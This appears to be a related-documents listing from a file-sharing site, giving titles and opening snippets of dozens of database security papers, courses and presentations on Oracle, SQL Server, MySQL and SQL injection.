Securing Data on Microsoft SQL Server 2012 Course 55096 The goal of this two-day instructor-led course is to provide students with the database and SQL server security knowledge and skills necessary to
2015 Jože Senegačnik Oracle ACE Director
Transparent Data Encryption and Data Redaction in Oracle 12c Jože Senegačnik www.dbprof. - joze.senegacnik@dbprof. 2015 Jože Senegačnik About the Speaker DbProf. Jože Senegačnik First experience with Oracle
Oracle Database Security
breaking through barriers to progress By Raman Jathar an award winning '2004 Future 50 Company' 18650 W. Corporate Drive Suite 120 Brookfield, WI 53045 262.792.0200 Database Security Lately, database security
Security Analysis. Spoofing Oracle Session Information
November 12, 2006 Security Analysis Spoofing Oracle Session Information OVERVIEW INTRODUCTION Oracle Database session information includes database user name, operating system user name, host, terminal,
Securing Oracle E-Business Suite in the Cloud
Securing Oracle E-Business Suite in the Cloud November 18, 2015 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development Integrigy Corporation Agenda The
How to Audit the Top Ten E-Business Suite Security Risks
In-Source Your IT Audit Series How to Audit the Top Ten E-Business Suite Security Risks February 28, 2012 Jeffrey T. Hare, CPA CISA CIA Industry Analyst, Author, Consultant ERP Risk Advisors Stephen Kost
The Ultimate Remote Database Administration Tool for Oracle, SQL Server and DB2 UDB
Proactive Technologies Inc. presents Version 4.0 The Ultimate Remote Database Administration Tool for Oracle, SQL Server and DB2 UDB The negative impact that downtime can have on a company has never been
SecureDoc Disk Encryption Cryptographic Engine
SecureDoc Disk Encryption Cryptographic Engine FIPS 140-2 Non-Proprietary Security Policy Abstract: This document specifies Security Policy enforced by SecureDoc Cryptographic Engine compliant with the
An Oracle White Paper March 2010. Oracle Transparent Data Encryption for SAP
An Oracle White Paper March 2010 Oracle Transparent Data Encryption for SAP Introduction Securing sensitive customer data has become more and more important in the last years. One possible threat is confidential
Achieving Security Compliancy and Database Transparency Using Database Activity Monitoring Systems
Achieving Security Compliancy and Database Transparency Using Database Activity Monitoring Systems By Paul M. Wright T he Oracle database has long been used as an effective tool for recording details that
Oracle Database 11g: Security Release 2
Oracle University Contact Us: 1.800.529.0165 Oracle Database 11g: Security Release 2 Duration: 5 Days What you will learn In this course, you'll learn how to use Oracle Database features to meet the security,
Comprehensive Approach to Database Security
Comprehensive Approach to Database Security [email protected] NYOUG 2008 1 What will I discuss today Identify Threats, Vulnerabilities and Risk to Databases Analyze the drivers for Database Security Identify
Top 10 Database. Misconfigurations. [email protected]
Top 10 Database Vulnerabilities and Misconfigurations Mark Trinidad [email protected] Some Newsworthy Breaches From 2011 2 In 2012.. Hackers carry 2011 momentum in 2012 Data theft, hacktivism, espionage
Setting up SQL Translation Framework OBE for Database 12cR1
Setting up SQL Translation Framework OBE for Database 12cR1 Overview Purpose This tutorial shows you how to use have an environment ready to demo the new Oracle Database 12c feature, SQL Translation Framework,
Safeguard Sensitive Data in EBS: A Look at Oracle Database Vault, Transparent Data Encryption, and Data Masking. Lucy Feng
Delivering Oracle Success Safeguard Sensitive Data in EBS: A Look at Oracle Database Vault, Transparent Data Encryption, and Data Masking Lucy Feng RMOUG Training Days February 2012 About DBAK Oracle Solution
How to Make Your Oracle APEX Application Secure
How to Make Your Oracle APEX Application Secure Peter Lorenzen Technology Manager WM-data Denmark a LogicaCMG Company [email protected] LogicaCMG 2006. All rights reserved 1 Presentation Target audience
MS-55096: Securing Data on Microsoft SQL Server 2012
MS-55096: Securing Data on Microsoft SQL Server 2012 Description The goal of this two-day instructor-led course is to provide students with the database and SQL server security knowledge and skills necessary
Microsoft SQL Server Security Best Practices
Microsoft SQL Server Security Best Practices This white paper contains administrative and operational best practices that should be performed from a security perspective when using Microsoft SQL Server.
Methods to increase search performance for encrypted databases
Available online at www.sciencedirect.com Procedia Economics and Finance 3 ( 2012 ) 1063 1068 Emerging Markets Queries in Finance and Business Methods to increase search performance for encrypted databases
Magento Security and Vulnerabilities. Roman Stepanov
Magento Security and Vulnerabilities Roman Stepanov http://ice.eltrino.com/ Table of contents Introduction Open Web Application Security Project OWASP TOP 10 List Common issues in Magento A1 Injection
Expert Oracle Application. Express Security. Scott Spendolini. Apress"
Expert Oracle Application Express Security Scott Spendolini Apress" Contents Foreword About the Author About the Technical Reviewer Acknowledgments Introduction xv xvii xix xxi xxiii BChapter 1: Threat
Oracle Database 10g: Security Release 2
Oracle University Chiamaci: 800 672 253 Oracle Database 10g: Security Release 2 Duration: 4 Days Description In this course, the students learn how they can use Oracle database features to meet the security
That Point of Sale is a PoS
SESSION ID: HTA-W02 That Point of Sale is a PoS Charles Henderson Vice President Managed Security Testing Trustwave @angus_tx David Byrne Senior Security Associate Bishop Fox Agenda POS Architecture Breach
Virtual Private Database Features in Oracle 10g.
Virtual Private Database Features in Oracle 10g. SAGE Computing Services Customised Oracle Training Workshops and Consulting. Christopher Muir Senior Systems Consultant Agenda Modern security requirements
MySQL Security: Best Practices
MySQL Security: Best Practices Sastry Vedantam [email protected] Safe Harbor Statement The following is intended to outline our general product direction. It is intended for information purposes
Agenda. SQL Injection Impact in the Real World. 8.1. Attack Scenario (1) CHAPTER 8 SQL Injection
Agenda CHAPTER 8 SQL Injection Slides adapted from "Foundations of Security: What Every Programmer Needs To Know" by Neil Daswani, Christoph Kern, and Anita Kesavan (ISBN 1590597842; http://www.foundationsofsecurity.com).
Oracle Database 10g Express
Oracle Database 10g Express This tutorial prepares the Oracle Database 10g Express Edition Developer to perform common development and administrative tasks of Oracle Database 10g Express Edition. Objectives
DOCUMENTATION MICROSOFT SQL BACKUP & RESTORE OPERATIONS
DOCUMENTATION MICROSOFT SQL BACKUP & RESTORE OPERATIONS Copyright Notice The use and copying of this product is subject to a license agreement. Any other use is prohibited. No part of this publication
NEW AND IMPROVED: HACKING ORACLE FROM WEB. Sumit sid Siddharth 7Safe Limited UK
NEW AND IMPROVED: HACKING ORACLE FROM WEB Sumit sid Siddharth 7Safe Limited UK About 7Safe Part of PA Consulting Group Security Services Penetration testing PCI-DSS Forensics Training E-discovery About
Microsoft SQL Server Integration Guide
Microsoft SQL Server Integration Guide Document Information Document Part Number 007-011108-001 (Rev J) Release Date August 2013 Trademarks All intellectual property is protected by copyright. All trademarks
White Paper BMC Remedy Action Request System Security
White Paper BMC Remedy Action Request System Security June 2008 www.bmc.com Contacting BMC Software You can access the BMC Software website at http://www.bmc.com. From this website, you can obtain information
Presentation for : The New England Board of Higher Education. Hot Topics in IT Security and Data Privacy
Presentation for : The New England Board of Higher Education Hot Topics in IT Security and Data Privacy October 22, 2010 Rocco Grillo, CISSP Managing Director Protiviti Inc. Quote of the Day "It takes
Oracle Database Security and Audit
Copyright 2014, Oracle Database Security and Audit Beyond Checklists Learning objectives Understand Oracle architecture Database Listener Oracle connection handshake Client/server architecture Authentication
Secure Coding (PL/SQL)
Secure Coding (PL/SQL) Securely coding Applications in PL/SQL 1 Legal Notice Oracle Database Security Presentation Published by PeteFinnigan.com Limited 9 Beech Grove Acomb York England, YO26 5LD Copyright
Real Life Database Security Mistakes. Stephen Kost Integrigy Corporation Session #715
Real Life Database Security Mistakes Stephen Kost Integrigy Corporation Session #715 Background Speaker Stephen Kost CTO and Founder 16 years working with Oracle 12 years focused on Oracle security DBA,
MyOra 3.0. User Guide. SQL Tool for Oracle. Jayam Systems, LLC
MyOra 3.0 SQL Tool for Oracle User Guide Jayam Systems, LLC Contents Features... 4 Connecting to the Database... 5 Login... 5 Login History... 6 Connection Indicator... 6 Closing the Connection... 7 SQL
PLOUG 2008. Oracle Security. Alexander Kornbrust, Jacek Sapiński 16-Oct-2008 OPITZ CONSULTING. Red-Database-Security GmbH
PLOUG 2008 Oracle Security Alexander Kornbrust, Jacek Sapiński 16-Oct-2008 1 Table of Content Introduction Why are databases still unsecure in 2008 Latest Trends Hacking Examples Typical problems & solutions
DigiVault Online Backup Manager. Microsoft SQL Server Backup/Restore Guide
DigiVault Online Backup Manager Microsoft SQL Server Backup/Restore Guide Version 4.6.1.4 October 2005 DigiVault Backup Manager User Guide 2 Table of Contents 1 Backup/Restore Microsoft SQL Server 7.0
SECUR IN MIRTH CONNECT. Best Practices and Vulnerabilities of Mirth Connect. Author: Jeff Campbell Technical Consultant, Galen Healthcare Solutions
SECUR Y IN MIRTH CONNECT Best Practices and Vulnerabilities of Mirth Connect Author: Jeff Campbell Technical Consultant, Galen Healthcare Solutions Date: May 15, 2015 galenhealthcare.com 2015. All rights
SQL Injection for newbie
SQL Injection for newbie SQL injection is a security vulnerability that occurs in a database layer of an application. It is technique to inject SQL query/command as an input via web pages. Sometimes we
Bruce Momjian June, 2008. Postgres Plus Technical Overview
Bruce Momjian June, 2008 Postgres Plus Technical Overview PostgreSQL Heritage Independent & Thriving Development Community 10 committers and ~200 reviewers 1,500 contributors and 10,000+ members 2,000,000+
WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
Security and Control Issues within Relational Databases
Security and Control Issues within Relational Databases David C. Ogbolumani, CISA, CISSP, CIA, CISM Practice Manager Information Security Preview of Key Points The Database Environment Top Database Threats
SafeNet DataSecure vs. Native Oracle Encryption
SafeNet vs. Native Encryption Executive Summary Given the vital records databases hold, these systems often represent one of the most critical areas of exposure for an enterprise. Consequently, as enterprises
Configuring and Monitoring Citrix Access Gateway-Linux Servers. eg Enterprise v5.6
Configuring and Monitoring Citrix Access Gateway-Linux Servers eg Enterprise v5.6 Restricted Rights Legend The information contained in this document is confidential and subject to change without notice.
